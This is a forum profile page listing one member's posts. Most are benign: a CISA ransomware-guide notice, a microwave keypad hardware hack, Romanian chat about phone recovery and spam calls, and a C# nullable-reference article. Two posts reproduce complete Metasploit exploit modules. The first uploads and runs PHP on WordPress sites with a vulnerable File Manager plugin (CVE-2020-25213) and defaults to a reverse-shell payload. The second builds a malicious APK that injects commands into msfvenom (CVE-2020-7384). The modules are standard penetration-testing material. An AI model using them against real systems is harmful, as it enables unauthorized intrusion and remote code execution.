Jump to content

Kev

Active Members
  • Posts

    1026
  • Joined

  • Days Won

    55

Everything posted by Kev

  1. Image cisa.gov On September 30, 2020, the Cybersecurity and Infrastructure Security Agency (CISA) and the Multi-State Information Sharing and Analysis Center released a joint Ransomware Guide, which is a customer centered, one-stop resource with best practices and ways to prevent, protect and/or respond to a ransomware attack. CISA and MS-ISAC are distributing this guide to inform and enhance network defense and reduce exposure to a ransomware attack: This Ransomware Guide includes two resources: Part 1: Ransomware Prevention Best Practices Part 2: Ransomware Response Checklist Download: https://www.cisa.gov/sites/default/files/publications/CISA_MS-ISAC_Ransomware%20Guide_S508C.pdf Source
  2. Nu stiu ce mananci tu stricat de faci atat off-topic/troll la asta ma am facut referire
  3. Mechanical keyboards are all the rage these days! People love the satisfying tactile sensation, and some go on great lengths to customise them to their exact liking. That begs the question: If we love it that much, why stop at just computer keyboards? If you think about it, there are plenty of everyday input devices in desperate need of mech-ing up! For example... a microwave keypad?? Yep you heard that right! Here is the story of how I added a RGB OLED hot-swap mechanical keypad to create the most pimped-up microwave in the entire world! Click me for high-res video with sound! Background A year ago, I picked up a used microwave for £5 at a carboot sale. It was a "Proline Micro Chef ST44": It appears to be from early 2000s, and is pretty unremarkable in every way. But it was cheap and it works, so good enough for me! Problem! That is, until almost exactly a year later. I pressed the usual buttons to heat up my meal, but nothing happened. After the initial disbelief, my thorough investigation by randomly prodding buttons revealed that the membrane keypad is likely broken. At first a few buttons still worked, but soon all the buttons stopped responding. At this point I could have just chucked it and still got my money's worth. But it seemed like a waste just because a cheap plastic keypad failed. Plus I could save a few pounds if I fixed it instead of buying a new one. So I took it apart and see if there was anything I could do. Disassembly After removing the case, we can see the main circuit board: Microcontroller at top-middle Buzzer at top-right Blue ribbon connector for keypad at middle-left Transformer and control relays near the bottom Entire board is through-hole, but I guess if it works it works! Here is the front side: The board is well marked, and it's interesting to see it uses a Vacuum Fluorescent Display (VFD), which was already falling out of favour by the time this was made. I also noticed this board, and in fact everything inside, was designed by Daewoo, a Korean conglomerate making everything from cars to, well, this. Anyway, back to the matter at hand. I thought I could just clean up the ribbon cable contacts and call it a day. Except I didn't notice the contacts were made from carbon(graphite?) instead of the usual metal, and I rubbed some right off: So if it wasn't broken then, it's definitely broken now. Great job! Enter the Matrix (Scanning) Still, it wasn't the end of the world. The keypad almost certainly uses Matrix Scanning to interface with the controller. There is a detailed introduction of this topic on Sparkfun. But in short, matrix scanning allows us to read a large number of inputs from limited number of controller pins. For example, there are more than 100 keys on our computer keyboard. If we simply connect each key to an input pin, the controller chip will need to have more than 100 pins! It will be bulky, difficult to route, and expensive to produce. Instead, with a little cleverness in the firmware, we can arrange the buttons in a grid of columns and rows, AKA a matrix, like this: This way, by scanning a single row and column at a time, we can determine which key(s) are pressed. Of course there are a lot more technicalities, so read more here if you want. Anyway, in the example above, instead of 4 * 4 = 16 pins, we only need 4 + 4 = 8 pins, a saving of half! And with our computer keyboard, we will only need around 20 pins instead of more than 100! Thus, we can see that Matrix Scanning simplifies the pin count and design complexity of input devices. Figuring Out the Matrix Back to our microwave keypad at hand. We can see its ribbon cable comes in two parts, each with 5 pins: So if my assumptions are correct, it would be a 5x5 matrix with 25 buttons. If you scroll all the way back up, you'll find the keypad has 24 buttons, so it checks out! Now we know there are 5 columns and 5 rows, it's time to figure out which key is which. To do that, I desoldered the ribbon cable connector and replaced it with a straight male header: As a side note, the microcontroller is a TMP47C412AN designed by Toshiba. It is a 4-bit processor with 4KB of ROM and 128 Bytes of RAM. It can also directly drive Vacuum Fluorescent Tubes. So all in all, a very specialised chip for appliances. Very underpowered compared to Arduinos and STM32s. But still, it gets the job done! I connected some jumper wires: And labeled the rows and columns with 1-5 and A-E: I then put the board back, powered on, and touched each pair of wires to see which button it responds as. It took a while, but eventually I figured out the matrix location of the buttons I need: So all in all, 10 numpad keys and 4 control buttons. There are a bunch of other buttons, but I didn't bother since I don't use them anyway. I quickly whipped up a simple schematic: With that, I hard-wired some buttons on a perf board as a quick and dirty fix: It works! At least I'll have hot meals now! And it didn't cost me a dime. But as you can see, it is very messy with 10 wires coming out of the case, and I'm sure I could do better. Pimp It Up! Around the same time, I was working on duckyPad, a 15-key mechanical macropad with OLED, hot-swap, RGB, and sophisticated input automation with duckyScript: Feel free to check out the project page if you're interested! I called it a "Do-It-All Macropad", so to live up to its name, it was only natural that I get it working on my microwave too! And if I pull this off, my lowly 20-year-old second-hand broken microwave will transform into the only one in the entire world with mechanical switches and RGB lighting! Now that's what I call ... a Korean Custom 😅. However, it wasn't as easy as it sounds. There are a number of challenges: I want to use the existing duckyPad as-is, so no redesigning. I want to keep it clean and tidy, so the fewer wires the better. It has to be powered by the microwave itself too. PMM Board Right now, there are 10 wires coming out of the case and into my hand-made keypad, very messy. Ideally, with duckyPad, I want it to use only 3 wires: Power, Ground, and Data. With so few wires, they can be inside a single cable, which would be much more clean and tidy. However, the microwave controller still expects 10 wires from the keypad matrix. So that means I would need an adapter of some sort. Let's just call it PMM board. duckyPad would talk to PMM board, which in turn talks to the microwave controller. Something like this: Not too bad! However, until now we have been using real switches with the keypad matrix. But with PMM board, we will need to control the key matrix electronically to fool the microwave into thinking we pressed buttons! How do we do it? Blast From the Past It came as a bit of a surprise, but after some digging, it turned out that I solved this exact problem 3 years ago! Back then, I was trying to automate inputs of Nintendo Switch Joycons, and they also used matrix scanning for their buttons. And the answer? Analogue Switches! You can think of them as regular switches, but instead of pushing them with your fingers, they are controlled electronically. The chip I used is ADG714 from Analog Devices. There are 8 switches in one chip, and they are controlled via simple SPI protocol: I quickly designed the PMM board: It's a relatively simple board. A STM32F042F6P6 is used, and I broke out all of its pins on headers in case I need them. Since there are 14 buttons that I want to control, two ADG714s are needed. With SPI, they can be daisy-chained easily. You can see in the schematic that the analogue switches are wired up in exactly the same way as my shoddy hand-soldered keypad. Except now they can be pressed electronically by the microcontroller. I had the PCB made, and soldered on all the components: I did a preliminary testing with continuity beeper, and it seemed to work fine, but we'll only know for sure once it is installed on the real thing. Serial-ous Talk Now the PMM board can control the button matrix, how should duckyPad talk to it? With only 1 wire for data, I reckoned that a simple one-way serial link should be more than enough. duckyPad would send a simple serial message at 115200bps every time a key is pressed. The PMM board receives it, and if the format is correct, it would momentarily close the corresponding analog switch, simulating a button press to the microwave. I added a top-secret UARTPRINT command to the duckyScript parser, and created a profile for my microwave keypad. They keys on duckyPad is arranged as follows: Why So Negative? It's all coming together! Which brings us to the final question: How are we going to power it? I thought it would be straightforward. There is already a microcontroller on the microwave circuit board, so just tap its power and job done! Turns out, almost but not quite. Examining the circuit board in detail, it turns out the whole thing runs on negative voltages. We can see it gets -26V from the transformer, steps it down to -12V, then again to -5V. The voltage regulator is a S7905PIC fixed-negative-voltage regulator, further confirming this theory. I'm not sure why it is designed this way, probably has something to do with the AC transformer. Still, it doesn't actually matter that much, as it's just from a different point of reference. I tapped two power wires from the circuit board to power the PMM board, and in turn, duckyPad: To reduce confusion, I marked them 0V and -5V. Usually, we would connect 0V to GND, and a positive voltage to VCC. But in this case, 0V is actually at the higher potential. So all I needed to do is connect -5V to GND, and 0V to VCC. The potential difference is still 5V, so everything works. (Eagle eyed viewers might notice I also covered the buzzer with a sticker. It was so loud!) A Duckin' Great Time! I reinstalled the circuit board, hooked everything up and did a quick test, it works! You can see the 3 wires going from duckyPad debug header to PMM board, as well as the 10 wires going into the control board where the blue ribbon cable used to be. I attached the duckyPad to the microwave, chopped off the ends of a cheap USB cable, and used the 4 wires inside to connect everything up through a vent at the bottom. Voilà! It's done! The first and (probably) only microwave in the entire universe with mechanical switches, OLED, and RGB lighting! Have you ever experienced the crisp and clicky tactile and audible perfection of Gateron Greens while heating up some frozen junk food at 2am because you're too lazy to cook? Well, I have, so there's that! Click me for high-res video with sound! I want one too! If you're interested in duckyPad, you can learn more about it and get one here! And if you want the whole package, unfortunately it would be much more involved. Each microwave have different keypad matrix layouts, so you'll need to figure them out, and design and build a PMM board yourself. Not a small feat, but at least all the information is here! If you do go down this path, let me know if you have any questions! Of course there are high voltages and potential of microwave radiation when you take it apart, so be careful! Other Stuff I've done a few other fun projects over the years, feel free to check them out: Daytripper: Hide-my-windows Laser Tripwire: Saves the day while you slack off! exixe: Miniture Nixie Tube driver module: Eliminate the need for vintage chips and multiplexing circuits. From Aduino to STM32: A detailed tutorial to get you started with STM32 development. List of all my repos Questions or Comments? Please feel free to open an issue, ask in the official duckyPad discord, DM me on discord dekuNukem#6998, or email dekuNukem@gmail.com for inquires. Source
  4. Nu era criptat este doar pattern, l-am gasit acum dupa ani 2016 cred - iti imaginezi ca nu stiu pattern-ul 2. nu am cum sa schimb placa,imi fac back-up baietii din service, evit situatia asta 3. Am urmarit un tutorial pe YouTube, unde explica un indian cum se recupereaza cu SDK si ADB (debug), insa imi cere sa pun AV-ul pe off, nu risc
  5. Salut, detin un telefon model Lenovo A2016a40, a trecuty o janta de 17" peste el. Vreau sa scot tot din el in PC (imagini din vacanta... etc), are pattern si nu il mai stiu (il conectam la un adaptor USB cu mouse); Am instalat sync, insa... nu ii pot da allow din telefon. Multumesc!
  6. The WordPress File Manager (wp-file-manager) plugin versions 6.0 through 6.8 allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HTTP::Wordpress prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::FileDropper def initialize(info = {}) super( update_info( info, 'Name' => 'WordPress File Manager Unauthenticated Remote Code Execution', 'Description' => %q{ The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory. }, 'License' => MSF_LICENSE, 'Author' => [ 'Alex Souza (w4fz5uck5)', # initial discovery and PoC 'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module ], 'References' => [ [ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ], [ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ], [ 'CVE', '2020-25213' ] ], 'Platform' => [ 'php' ], 'Privileged' => false, 'Arch' => ARCH_PHP, 'Targets' => [ [ 'WordPress File Manager 6.0-6.8', { 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' } } ] ], 'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020 'DefaultTarget' => 0 ) ) register_options( [ OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']), OptEnum.new('COMMAND', [true, 'elFinder commands used to exploit the vulnerability', 'upload', %w[upload mkfile+put]]) ] ) end def check return CheckCode::Unknown unless wordpress_and_online? # check the plugin version from readme check_plugin_version_from_readme('wp-file-manager', '6.9', '6.0') end def exploit # base path to File Manager plugin file_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager') # filename of the file to be uploaded/created filename = "#{Rex::Text.rand_text_alphanumeric(6)}.php" register_file_for_cleanup(filename) case datastore['COMMAND'] when 'upload' elfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename) when 'mkfile+put' elfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename) elfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename) end payload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename) print_status("#{peer} - Payload is at #{payload_uri}") # execute the payload send_request_cgi('uri' => normalize_uri(payload_uri)) end # make it easier to switch between "upload" and "mkfile+put" exploit methods def elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {}) filename = opts['filename'] # prep for exploit post_data = Rex::MIME::Message.new post_data.add_part(elfinder_cmd, nil, nil, 'form-data; name="cmd"') case elfinder_cmd when 'upload' post_data.add_part('l1_', nil, nil, 'form-data; name="target"') post_data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"upload[]\"; filename=\"#{filename}\"") when 'mkfile' post_data.add_part('l1_', nil, nil, 'form-data; name="target"') post_data.add_part(filename, nil, nil, 'form-data; name="name"') when 'put' post_data.add_part("l1_#{Rex::Text.encode_base64(filename)}", nil, nil, 'form-data; name="target"') post_data.add_part(payload.encoded, nil, nil, 'form-data; name="content"') end res = send_request_cgi( 'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'), 'method' => 'POST', 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", 'data' => post_data.to_s ) fail_with(Failure::Unreachable, "#{peer} - Could not connect") unless res fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected HTTP response code: #{res.code}") unless res.code == 200 end end Source
  7. This Metasploit module exploits a command injection vulnerability in Metasploit Framework's msfvenom payload generator when using a crafted APK file as an Android payload template. Affected includes Metasploit Framework versions 6.0.11 and below and Metasploit Pro versions 4.18.0 and below. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'rex/zip/jar' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT def initialize(info = {}) super( update_info( info, 'Name' => 'Rapid7 Metasploit Framework msfvenom APK Template Command Injection', 'Description' => %q{ This module exploits a command injection vulnerability in Metasploit Framework's msfvenom payload generator when using a crafted APK file as an Android payload template. Affects Metasploit Framework <= 6.0.11 and Metasploit Pro <= 4.18.0. The file produced by this module is a relatively empty yet valid-enough APK file. To trigger the vulnerability, the victim user should do the following: msfvenom -p android/<...> -x <crafted_file.apk> }, 'License' => MSF_LICENSE, 'Author' => [ 'Justin Steven' # @justinsteven ], 'References' => [ ['URL', 'https://github.com/justinsteven/advisories/blob/master/2020_metasploit_msfvenom_apk_template_cmdi.md'], ['CVE', '2020-7384'], ], 'DefaultOptions' => { 'DisablePayloadHandler' => true }, 'Arch' => ARCH_CMD, 'Platform' => 'unix', 'Payload' => { 'BadChars' => "\x22\x2c\x5c\x0a\x0d" }, 'Targets' => [[ 'Automatic', {}]], 'Privileged' => false, 'DisclosureDate' => '2020-10-29' ) ) register_options([ OptString.new('FILENAME', [true, 'The APK file name', 'msf.apk']) ]) end def build_x509_name name = "CN=';(#{payload.encoded}) >&- 2>&- & #" OpenSSL::X509::Name.parse(name) end def generate_signing_material key = OpenSSL::PKey::RSA.new(2048) cert = OpenSSL::X509::Certificate.new cert.version = 2 cert.serial = 1 cert.subject = cert.issuer = build_x509_name cert.public_key = key.public_key cert.not_before = Time.now # FIXME: this will break in the year 2037 on 32-bit systems cert.not_after = cert.not_before + 1.year # Self-sign the certificate, otherwise the victim's keytool gets unhappy cert.sign(key, OpenSSL::Digest::SHA256.new) [cert, key] end def exploit print_warning('Warning: bash payloads are unlikely to work') if datastore['PAYLOAD'].include?('bash') apk = Rex::Zip::Jar.new apk.build_manifest cert, key = generate_signing_material apk.sign(key, cert) data = apk.pack file_create(data) end end Source
  8. Kev

    Spam caller

    ^ {[In caz* (tastatura) u langa i ]} \ Trebuia sa specifici Aviz amatorilor, NU sunati inapoi, sunt numere cu suprataxa (taxa inversa) ascultati muzica de platiti factura cat pentru toate biletele Cenaclul Flacara
  9. It's not a secret that Microsoft has been working on the 8-th version of C# language for quite a while. The new language version (C# 8.0) is already available in the recent release of Visual Studio 2019, but it's still in beta. This new version is going to have a few features implemented in a somewhat non-obvious, or rather unexpected, way. Nullable Reference types are one of them. This feature is announced as a means to fight Null Reference Exceptions (NRE). It's good to see the language evolve and acquire new features to help developers. By coincidence, some time ago, we significantly enhanced the ability of PVS-Studio's C# analyzer to detect NREs. And now we're wondering if static analyzers in general and PVS-Studio in particular should still bother to diagnose potential null dereferences since, at least in new code that will be making use of Nullable Reference, such dereferences will become "impossible"? Let's try to clear that up. Pros and cons of the new feature One reminder before we continue: the latest beta version of C# 8.0, available as of writing this post, has Nullable Reference types disabled by default, i.e. the behavior of reference types hasn't changed. So what are exactly nullable reference types in C# 8.0 if we enable this option? They are basically the same good old reference types except that now you'll have to add '?' after the type name (for example, string?), similarly to Nullable<T>, i.e. nullable value types (for example, int?). Without the '?', our string type will now be interpreted as non-nullable reference, i.e. a reference type that can't be assigned null. Null Reference Exception is one of the most vexing exceptions to get into your program because it doesn't say much about its source, especially if the throwing method contains a number of dereference operations in a row. The ability to prohibit null assignment to a variable of a reference type looks cool, but what about those cases where passing a null to a method has some execution logic depending on it? Instead of null, we could, of course, use a literal, a constant, or simply an "impossible" value that logically can't be assigned to the variable anywhere else. But this poses a risk of replacing a crash of the program with "silent", but incorrect execution, which is often worse than facing the error right away. What about throwing an exception then? A meaningful exception thrown in a location where something went wrong is always better than an NRE somewhere up or down the stack. But it's only good in your own project, where you can correct the consumers by inserting a try-catch block and it's solely your responsibility. When developing a library using (non) Nullable Reference, we need to guarantee that a certain method always returns a value. After all, it's not always possible (or at least easy) even in your own code to replace the returning of null with exception throwing (since it may affect too much code). Nullable Reference can be enabled either at the global project level by adding the NullableContextOptions property with the value enable, or at the file level by means of the preprocessor directive: #nullable enable string cantBeNull = string.Empty; string? canBeNull = null; cantBeNull = canBeNull!; Nullable Reference feature will make types more informative. The method signature gives you a clue about its behavior: if it has a null check or not, if it can return null or not. Now, when you try using a nullable reference variable without checking it, the compiler will issue a warning. This is pretty convenient when using third-party libraries, but it also adds a risk of misleading library's user, as it's still possible to pass null using the new null-forgiving operator (!). That is, adding just one exclamation point can break all further assumptions about the interface using such variables: #nullable enable String GetStr() { return _count > 0 ? _str : null!; } String str = GetStr(); var len = str.Length; Yes, you can argue that this is bad programming and nobody would write code like that for real, but as long as this can potentially be done, you can't feel safe relying only on the contract imposed by the interface of a given method (saying that it can't return null). By the way, you could write the same code using several ! operators, as C# now allows you to do so (and such code is perfectly compilable): cantBeNull = canBeNull!!!!!!!; By writing this way we, so to say, stress the idea, "look, this may be null!!!" (we in our team, we call this "emotional" programming). In fact, when building the syntax tree, the compiler (from Roslyn) interprets the ! operator in the same way as it interprets regular parentheses, which means you can write as many !'s as you like - just like with parentheses. But if you write enough of them, you can "knock down" the compiler. Maybe this will get fixed in the final release of C# 8.0. Similarly, you can circumvent the compiler warning when accessing a nullable reference variable without a check: canBeNull!.ToString(); Let's add more emotions: canBeNull!!!?.ToString(); You'll hardly ever see syntax like that in real code though. By writing the null-forgiving operator we tell the compiler, "This code is okay, check not needed." By adding the Elvis operator we tell it, "Or maybe not; let's check it just in case." Now, you can reasonably ask why you still can have null assigned to variables of non-nullable reference types so easily if the very concept of these type implies that such variables can't have the value null? The answer is that "under the hood", at the IL code level, our non-nullable reference type is still... the good old "regular" reference type, and the entire nullability syntax is actually just an annotation for the compiler's built-in analyzer (which, we believe, isn't quite convenient to use, but I'll elaborate on that later). Personally, we don't find it a "neat" solution to include the new syntax as simply an annotation for a third-party tool (even built into the compiler) because the fact that this is just an annotation may not be obvious at all to the programmer, as this syntax is very similar to the syntax for nullable structs yet works in a totally different way. Getting back to other ways of breaking Nullable Reference types. As of the moment of writing this article, when you have a solution comprised of several projects, passing a variable of a reference type, say, String from a method declared in one project to a method in another project that has the NullableContextOptions enabled will make the compiler assume it's dealing with a non-nullable String and the compiler will remain silent. And that's despite the tons of [Nullable(1)] attributes added to every field and method in the IL code when enabling Nullable References. These attributes, by the way, should be taken into account if you use reflection to handle the attributes and assume that the code contains only your custom ones. Such a situation may cause additional trouble when adapting a large code base to the Nullable Reference style. This process will likely be running for a while, project by project. If you are careful, of course, you can gradually integrate the new feature, but if you already have a working project, any changes to it are dangerous and undesirable (if it works, don't touch it!). That's why we made sure that you don't have to modify your source code or mark it to detect potential NREs when using PVS-Studio analyzer. To check locations that could throw a NullReferenceException, simply run the analyzer and look for V3080 warnings. No need to change the project's properties or the source code. No need to add directives, attributes, or operators. No need to change legacy code. When adding Nullable Reference support to PVS-Studio, we had to decide whether the analyzer should assume that variables of non-nullable reference types always have non-null values. After investigating the ways this guarantee could be broken, we decided that PVS-Studio shouldn't make such an assumption. After all, even if a project uses non-nullable reference types all the way through, the analyzer could add to this feature by detecting those specific situations where such variables could have the value null. How PVS-Studio looks for Null Reference Exceptions The dataflow mechanisms in PVS-Studio's C# analyzer track possible values of variables during the analysis process. This also includes interprocedural analysis, i.e. tracking down possible values returned by a method and its nested methods, and so on. In addition to that, PVS-Studio remembers variables that could be assigned null value. Whenever it sees such a variable being dereferenced without a check, whether it's in the current code under analysis, or inside a method invoked in this code, it will issue a V3080 warning about a potential Null Reference Exception. The idea behind this diagnostic is to have the analyzer get angry only when it sees a null assignment. This is the principal difference of our diagnostic's behavior from that of the compiler's built-in analyzer handling Nullable Reference types. The built-in analyzer will point at each and every dereference of an unchecked nullable reference variable - given that it hasn't been misled by the use of the ! operator or even just a complicated check (it should be noted, however, that absolutely any static analyzer, PVS-Studio being no exception here, can be "misled" one way or another, especially if you are intent on doing so). PVS-Studio, on the other hand, warns you only if it sees a null (whether within the local context or the context of an outside method). Even if the variable is of a non-nullable reference type, the analyzer will keep pointing at it if it sees a null assignment to that variable. This approach, we believe, is more appropriate (or at least more convenient for the user) since it doesn't demand "smearing" the entire code with null checks to track potential dereferences - after all, this option was available even before Nullable Reference were introduced, for example, through the use of contracts. What's more, the analyzer can now provide a better control over non-nullable reference variables themselves. If such a variable is used "fairly" and never gets assigned null, PVS-Studio won't say a word. If the variable is assigned null and then dereferenced without a prior check, PVS-Studio will issue a V3080 warning: #nullable enable String GetStr() { return _count > 0 ? _str : null!; } String str = GetStr(); var len = str.Length; <== V3080: Possible null dereference. Consider inspecting 'str' Now let's take a look at some examples demonstrating how this diagnostic is triggered by the code of Roslyn itself. We already checked this project recently, but this time we'll be looking only at potential Null Reference Exceptions not mentioned in the previous articles. We'll see how PVS-Studio detects potential NREs and how they can be fixed using the new Nullable Reference syntax. V3080 [CWE-476] Possible null dereference inside method. Consider inspecting the 2nd argument: chainedTupleType. Microsoft.CodeAnalysis.CSharp TupleTypeSymbol.cs 244 NamedTypeSymbol chainedTupleType; if (_underlyingType.Arity < TupleTypeSymbol.RestPosition) { .... chainedTupleType = null; } else { .... } return Create(ConstructTupleUnderlyingType(firstTupleType, chainedTupleType, newElementTypes), elementNames: _elementNames); As you can see, the chainedTupleType variable can be assigned the null value in one of the execution branches. It is then passed to the ConstructTupleUnderlyingType method and used there after a Debug.Assert check. It's a very common pattern in Roslyn, but keep in mind that Debug.Assert is removed in the release version. That's why the analyzer still considers the dereference inside the ConstructTupleUnderlyingType method dangerous. Here's the body of that method, where the dereference takes place: internal static NamedTypeSymbol ConstructTupleUnderlyingType( NamedTypeSymbol firstTupleType, NamedTypeSymbol chainedTupleTypeOpt, ImmutableArray<TypeWithAnnotations> elementTypes) { Debug.Assert (chainedTupleTypeOpt is null == elementTypes.Length < RestPosition); .... while (loop > 0) { .... currentSymbol = chainedTupleTypeOpt.Construct(chainedTypes); loop--; } return currentSymbol; } It's actually a matter of dispute whether the analyzer should take Asserts like that into account (some of our users want it to do so) - after all, the analyzer does take contracts from System.Diagnostics.Contracts into account. Here's one small real-life example from our experience of using Roslyn in our own analyzer. While adding support of the latest version of Visual Studio recently, we also updated Roslyn to its 3rd version. After that, PVS-Studio started crashing on certain code it had never crashed on before. The crash, accompanied by a Null Reference Exception, would occur not in our code but in the code of Roslyn. Debugging revealed that the code fragment where Roslyn was now crashing had that very kind of Debug.Assert based null check several lines higher - and that check obviously didn't help. It's a graphic example of how you can get into trouble with Nullable Reference because of the compiler treating Debug.Assert as a reliable check in any configuration. That is, if you add #nullable enable and mark the chainedTupleTypeOpt argument as a nullable reference, the compiler won't issue any warning on the dereference inside the ConstructTupleUnderlyingType method. Moving on to other examples of warnings by PVS-Studio. V3080 Possible null dereference. Consider inspecting 'effectiveRuleset'. RuleSet.cs 146 var effectiveRuleset = ruleSet.GetEffectiveRuleSet(includedRulesetPaths); effectiveRuleset = effectiveRuleset.WithEffectiveAction(ruleSetInclude.Action); if (IsStricterThan(effectiveRuleset.GeneralDiagnosticOption, ....)) effectiveGeneralOption = effectiveRuleset.GeneralDiagnosticOption; This warning says that the call of the WithEffectiveAction method may return null, while the return value assigned to the variable effectiveRuleset is not checked before use (effectiveRuleset.GeneralDiagnosticOption). Here's the body of the WithEffectiveAction method: public RuleSet WithEffectiveAction(ReportDiagnostic action) { if (!_includes.IsEmpty) throw new ArgumentException(....); switch (action) { case ReportDiagnostic.Default: return this; case ReportDiagnostic.Suppress: return null; .... return new RuleSet(....); default: return null; } } With Nullable Reference enabled for the method GetEffectiveRuleSet, we'll get two locations where the code's behavior has to be changed. Since the method shown above can throw an exception, it's logical to assume that the call to it is wrapped in a try-catch block and it would be correct to rewrite the method to throw an exception rather than return null. However, if you trace a few calls back, you'll see that the catching code is too far up to reliably predict the consequences. Let's take a look at the consumer of the effectiveRuleset variable, the IsStricterThan method: private static bool IsStricterThan(ReportDiagnostic action1, ReportDiagnostic action2) { switch (action2) { case ReportDiagnostic.Suppress: ....; case ReportDiagnostic.Warn: return action1 == ReportDiagnostic.Error; case ReportDiagnostic.Error: return false; default: return false; } } As you can see, it's a simple switch statement choosing between two enumerations, with ReportDiagnostic.Default as the default value. So it would be best to rewrite the call as follows: The signature of WithEffectiveAction will change: #nullable enable public RuleSet? WithEffectiveAction(ReportDiagnostic action) This is what the call will look like: RuleSet? effectiveRuleset = ruleSet.GetEffectiveRuleSet(includedRulesetPaths); effectiveRuleset = effectiveRuleset?.WithEffectiveAction(ruleSetInclude.Action); if (IsStricterThan(effectiveRuleset?.GeneralDiagnosticOption ?? ReportDiagnostic.Default, effectiveGeneralOption)) effectiveGeneralOption = effectiveRuleset.GeneralDiagnosticOption; Since IsStricterThan only performs comparison, the condition can be rewritten - for example, like this: if (effectiveRuleset == null || IsStricterThan(effectiveRuleset.GeneralDiagnosticOption, effectiveGeneralOption)) Next example. V3080 Possible null dereference. Consider inspecting 'propertySymbol'. BinderFactory.BinderFactoryVisitor.cs 372 var propertySymbol = GetPropertySymbol(parent, resultBinder); var accessor = propertySymbol.GetMethod; if ((object)accessor != null) resultBinder = new InMethodBinder(accessor, resultBinder); To fix this warning, we need to see what happens to the propertySymbol variable next. private SourcePropertySymbol GetPropertySymbol( BasePropertyDeclarationSyntax basePropertyDeclarationSyntax, Binder outerBinder) { .... NamedTypeSymbol container = GetContainerType(outerBinder, basePropertyDeclarationSyntax); if ((object)container == null) return null; .... return (SourcePropertySymbol)GetMemberSymbol(propertyName, basePropertyDeclarationSyntax.Span, container, SymbolKind.Property); } The GetMemberSymbol method, too, can return null under certain conditions. private Symbol GetMemberSymbol( string memberName, TextSpan memberSpan, NamedTypeSymbol container, SymbolKind kind) { foreach (Symbol sym in container.GetMembers(memberName)) { if (sym.Kind != kind) continue; if (sym.Kind == SymbolKind.Method) { .... var implementation = ((MethodSymbol)sym).PartialImplementationPart; if ((object)implementation != null) if (InSpan(implementation.Locations[0], this.syntaxTree, memberSpan)) return implementation; } else if (InSpan(sym.Locations, this.syntaxTree, memberSpan)) return sym; } return null; } With nullable reference types enabled, the call will change to this: #nullable enable SourcePropertySymbol? propertySymbol = GetPropertySymbol(parent, resultBinder); MethodSymbol? accessor = propertySymbol?.GetMethod; if ((object)accessor != null) resultBinder = new InMethodBinder(accessor, resultBinder); It's pretty easy to fix when you know where to look. Static analysis can catch this potential error with no effort by collecting all possible values of the field from all the procedure call chains. V3080 Possible null dereference. Consider inspecting 'simpleName'. CSharpCommandLineParser.cs 1556 string simpleName; simpleName = PathUtilities.RemoveExtension( PathUtilities.GetFileName(sourceFiles.FirstOrDefault().Path)); outputFileName = simpleName + outputKind.GetDefaultExtension(); if (simpleName.Length == 0 && !outputKind.IsNetModule()) .... The problem is in the line with the simpleName.Length check. The variable simpleName results from executing a long series of methods and can be assigned null. By the way, if you are curious, you could look at the RemoveExtension method to see how it's different from Path.GetFileNameWithoutExtension. A simpleName != null check would be enough, but with non-nullable reference types, the code will change to something like this: #nullable enable public static string? RemoveExtension(string path) { .... } string simpleName; This is what the call might look like: simpleName = PathUtilities.RemoveExtension( PathUtilities.GetFileName(sourceFiles.FirstOrDefault().Path)) ?? String.Empty; Conclusion Nullable Reference types can be a great help when designing architecture from scratch, but reworking existing code may require a lot of time and care, as it may lead to a number of elusive bugs. This article doesn't aim to discourage you from using Nullable Reference types. We find this new feature generally useful even though the exact way it is implemented may be controversial. However, always remember about the limitations of this approach and keep in mind that enabling Nullable Reference mode doesn't protect you from NREs and that, when misused, it could itself become the source of these errors. We recommend that you complement the Nullable Reference feature with a modern static analysis tool, such as PVS-Studio, that supports interprocedural analysis to protect your program from NREs. Each of these approaches - deep interprocedural analysis and annotating method signatures (which is in fact what Nullable Reference mode does) - have their pros and cons. The analyzer will provide you with a list of potentially dangerous locations and let you see the consequences of modifying existing code. If there is a null assignment somewhere, the analyzer will point at every consumer of the variable where it is dereferenced without a check. You can check this project or your own projects for other defects - just download PVS-Studio and give it a try. Source
